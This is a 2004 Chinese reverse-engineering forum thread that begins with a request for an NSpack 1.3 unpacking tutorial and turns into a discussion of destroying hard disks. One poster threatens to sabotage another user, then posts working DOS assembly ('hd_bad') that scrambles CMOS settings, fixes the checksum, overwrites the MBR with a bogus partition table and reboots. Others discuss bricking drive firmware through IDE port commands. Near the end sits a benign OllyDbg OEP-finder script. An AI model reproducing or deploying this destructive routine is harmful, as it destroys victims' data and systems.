首页
社区
课程
招聘
哪位大侠能作个脱北斗壳的动画教程,不甚感激!!
发表于: 2004-12-28 20:31 6502

哪位大侠能作个脱北斗壳的动画教程,不甚感激!!

2004-12-28 20:31
6502
有没有哪位大侠能作个脱北斗程序压缩1.3的动画教程,或者干脆作个脱壳机。
不知道那位自做清高的斑竹,会不会把我封掉。听天由命了

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (24)
雪    币: 898
活跃值: (4054)
能力值: ( LV9,RANK:3410 )
在线值:
发帖
回帖
粉丝
2
你上传病毒/后门程序至少要说明清楚吧

呵呵,自做清高是啥意思?
如果要封你你现在还能发贴?
2004-12-28 20:36
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我已经在后面说了不要运行了呀
2004-12-28 20:41
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
还有,我说你清高,不是说你封我贴
而是你回下面这个帖子的时候
http://bbs.pediy.com/showthread.php?s=&threadid=7207&highlight=%B1%B1%B6%B7
2004-12-28 20:44
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5
sfw4499 喜欢做病毒是吗?  我晚上写个代码给你  你也别运行 只要找到OEP就可以了  想试试吗?  我敢保证你在找到OEP前 硬盘彻底坏了(NT除外)
2004-12-28 20:58
0
雪    币: 898
活跃值: (4054)
能力值: ( LV9,RANK:3410 )
在线值:
发帖
回帖
粉丝
6
最初由 sfw4499 发布
还有,我说你清高,不是说你封我贴
而是你回下面这个帖子的时候
http://bbs.pediy.com/showthread.php?s=&threadid=7207&highlight=%B1%B1%B6%B7


我回帖内容是:
修行在个人,学习从根本上说都是自己的努力

请教有何差错?
2004-12-28 21:01
0
雪    币: 411
活跃值: (1160)
能力值: ( LV9,RANK:810 )
在线值:
发帖
回帖
粉丝
7
2004-12-28 21:34
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
8
最初由 vcasm 发布
sfw4499 喜欢做病毒是吗? 我晚上写个代码给你 你也别运行 只要找到OEP就可以了 想试试吗? 我敢保证你在找到OEP前 硬盘彻底坏了(NT除外)


试一下?
2004-12-28 22:06
0
雪    币: 106832
活跃值: (202484)
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
9
最初由 David 发布
首先,fly是我们公认的大侠,其热心人所共睹,请对他客气尊敬些。

脱壳动画可以看这篇,不是会员请注册。

07fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4Z5K9h3&6S2k6r3k6G2M7X3y4W2i4K6u0W2j5$3!0E0i4K6u0r3N6X3W2W2N6%4c8Z5M7X3g2S2k6q4)9J5k6i4m8Z5M7q4)9K6c8Y4c8A6k6q4)9K6c8o6p5@1y4U0b7K6z5g2)9J5y4X3k6H3j5h3N6W2i4K6y4p5x3g2)9J5y4X3S2A6k6$3S2D9K9h3N6Z5N6q4)9K6c8q4)9J5y4f1x3#2i4K6t1#2c8o6N6Q4x3U0g2p5y4#2)9J5y4f1p5&6
........


你是热心人!!
谢谢对看雪论坛的支持!!!
2004-12-28 22:06
0
雪    币: 390
活跃值: (707)
能力值: ( LV12,RANK:650 )
在线值:
发帖
回帖
粉丝
10
最初由 vcasm 发布
sfw4499 喜欢做病毒是吗? 我晚上写个代码给你 你也别运行 只要找到OEP就可以了 想试试吗? 我敢保证你在找到OEP前 硬盘彻底坏了(NT除外)


拿来看看?8要告诉我你在9x下拿ring0(sidt?)然后写ide端口。:D

记得ide规范里有一个命令是和microcode/firmware有关的,8要说就是那个!:D
2004-12-28 22:11
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
11
嘿嘿 干坏事当然要直接操作端口....不然顶多只能干删硬盘文件写分区表的事了 :(
2004-12-28 22:34
0
雪    币: 390
活跃值: (707)
能力值: ( LV12,RANK:650 )
在线值:
发帖
回帖
粉丝
12
写一个放上来,让我学学。

机械版的ide规范没有详细说明。:D
2004-12-28 22:36
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
13
晕  学习这些干吗?
记得在95年左右老外有个硬盘加密锁的软件 当时为了分析害的我坏了2个硬盘,最后还是借同学的硬盘继续测试才弄清楚原理...
后来自己学习编写病毒代码用上了这些技术,害的自己以后的日子经常中自己病毒的招
其实几年后的KV江明逻辑锁用的也就是这个原理
实际上知道破坏原理了,恢复起来很简单....只不过这样的坏事N年以后再做也不会有太大的破坏效果了
2004-12-28 22:46
0
雪    币: 390
活跃值: (707)
能力值: ( LV12,RANK:650 )
在线值:
发帖
回帖
粉丝
14
最初由 vcasm 发布
晕 学习这些干吗?
记得在95年左右老外有个硬盘加密锁的软件 当时为了分析害的我坏了2个硬盘,最后还是借同学的硬盘继续测试才弄清楚原理...
后来自己学习编写病毒代码用上了这些技术,害的自己以后的日子经常中自己病毒的招
其实几年后的KV江明逻辑锁用的也就是这个原理
实际上知道破坏原理了,恢复起来很简单....只不过这样的坏事N年以后再做也不会有太大的破坏效果了


那个不一样,那是利用了DOS的bug而已。我写个i/o port,在bios里屏蔽硬盘,照样读写。

但是直接搞硬件就不一样。把firmware搞坏了,只有送厂家。
2004-12-28 22:51
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
15
硬盘难度比主板大  firstrose 你有方法能够做到?  共享一下吧:D
2004-12-28 23:04
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
16
直接写端口简单  下面的代码只要运行  硬盘就无法使用了  不过修复也简单
hd_bad:    xor ax,ax
           mov ds,ax
           mov bx,word ptr ds:[46ch]
           mov al,11h
           out 70h,al
           mov al,0ffh
           out 71h,al
           mov al,1ch
           out 70h,al
           mov al,bl
           out 71h,al
           mov al,1dh
           out 70h,al
           mov al,bh
           out 71h,al
           mov cl,10h
           xor dx,dx
lop_rom:
           mov al,cl
           out 70h,al
           in  al,71h
           xor ah,ah
           add dx,ax
           inc cl
           cmp cl,2eh
           jnz lop_rom
           mov al,2eh
           out 70h,al
           mov al,dh
           out 71h,al
           mov al,2fh
           out 70h,al
           mov al,dl
           out 71h,al
           mov ax,0301h
           mov bx,offset BADDISK-1beh
           add bx,bp
           mov word ptr es:[bx],18cdh
           push cs
           pop  es
           mov cx,0001h
           mov dx,0080h
           int 13h
           int 19h
BADDISK    db 80h,00h,01h,00h,05h,3fh,7fh,96h
           db 3fh,00h,00h,00h,01h,0ah,19h,00h
           db 00h,00h,41h,97h,00h,3fh,0ffh,0fdh
           db 40h,0ah,19h,00h,40h,0d6h,25h,00h
           db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
           db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
           db 55h,0aah
2004-12-28 23:10
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
17
其实直接写端口也能构将早期的硬盘弄坏  不过不是写磁盘数据  具体的源码找不到了
2004-12-28 23:13
0
雪    币: 427
活跃值: (412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
我也有这样的软件,原理比较变态的,作者也无法恢复。可以参看电脑报配套光盘第2辑个人程序区,好像带了原代码!
2004-12-28 23:14
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
19
郁闷死了  以前写的写硬盘端口的代码都找不到了
2004-12-28 23:37
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
20
-_-!!!
2004-12-29 02:07
0
雪    币: 390
活跃值: (707)
能力值: ( LV12,RANK:650 )
在线值:
发帖
回帖
粉丝
21
很失望,原来是搅乱CMOS信息后int13h写MBR。

方法是有。我前面不是说了吗,可以破坏microcode。有命令可以做到。但是奇怪的是,只有写,没有读的。这可能就是你说的破坏早期硬盘。现在的硬盘,估计只有反复recalibrate了。
2004-12-29 08:55
0
雪    币: 260
活跃值: (167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
22
是的 写硬盘端口的代码没找到 很多年没碰那玩意了
2004-12-29 12:05
0
雪    币: 0
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
23
-_-!!!
2004-12-29 13:19
0
雪    币: 192
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
脱壳脚本

// NSpack 1.3 OEP Finder v0.1
// by ★LOCKLOSE★
// http://bbs.pediy.com

  var addr
  sto
  sto
  mov addr,esp
  bphws addr,"r"
  run
  sto
  sto
  an eip
2004-12-29 21:17
0
雪    币: 390
活跃值: (707)
能力值: ( LV12,RANK:650 )
在线值:
发帖
回帖
粉丝
25
最初由 鸡蛋壳 发布
我也有这样的软件,原理比较变态的,作者也无法恢复。可以参看电脑报配套光盘第2辑个人程序区,好像带了原代码!


好象没有看见啊
2005-1-1 11:41
0
游客
登录 | 注册 方可回帖
返回